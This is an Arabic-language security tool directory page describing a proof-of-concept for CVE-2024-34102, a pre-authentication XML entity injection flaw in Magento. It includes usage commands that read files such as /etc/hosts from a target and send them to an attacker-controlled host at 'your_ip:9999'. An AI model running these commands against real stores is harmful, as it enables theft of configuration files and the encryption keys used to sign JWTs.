Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34102 — عرض PoC , ثغرة حقن كيان XML حرجة في Magento | Kitploit
أدوات/GitHubGitHub/d0rb/cve-2024-34102
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubd0rb/cve-2024-34102

CVE-2024-34102

عرض PoC , ثغرة حقن كيان XML حرجة في Magento

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

نطالب بإعادة جميع المواطنين الذين تم أسرهم كرهائن من قبل جماعة حماس الإرهابية سالمين. لن نتوقف حتى يتم إطلاق سراح كل رهينة ويعود إلى منزله بسلام. يمكنك المساعدة في إعادتهم إلى الوطن. https://stories.bringthemhomenow.net/

دليل استغلال CVE-2024-34102 🚀

يحتوي هذا المستودع على دليل استغلال (PoC) لثغرة حقن كيان XML الحرجة (CVE-2024-34102) في Magento. تسمح هذه الثغرة بتسريب الملفات الحساسة، والتي يمكن بعد ذلك استغلالها للحصول على وصول غير مصرح به إلى وظائف Magento الإدارية. صُمم هذا الدليل للأغراض التعليمية ويجب استخدامه بمسؤولية.

نظرة عامة 📖

Magento هو أحد أشهر حلول التجارة الإلكترونية المستخدمة عالميًا. في يونيو 2024، تم اكتشاف مشكلة حقن كيان XML حرجة قبل المصادقة، تم تعريفها باسم CVE-2024-34102. يمكن أن تؤدي هذه الثغرة إلى عواقب وخيمة، بما في ذلك تسريب ملف app/etc/env.php من Magento، الذي يحتوي على مفاتيح تشفير تستخدم لتوقيع JWTs.

الميزات 🌟

  • تسريب الملفات الحساسة من مثيل Magento المعرض للخطر.
  • استخدام بسيط ومباشر.
  • عرض تعليمي لحقن كيان XML.

الاستخدام 🚀

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests (pip install requests)

تشغيل دليل الاستغلال

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. تنفيذ السكربت مع الوسائط اللازمة:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

وسائط سطر الأوامر

  • --target-url: عنوان URL لمثيل Magento المستهدف.
  • --target-file: مسار الملف على الخادم المستهدف لتسريبه.
  • --exfil-url: عنوان URL لاستقبال البيانات المسربة.

مثال 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
تنزيل الأداة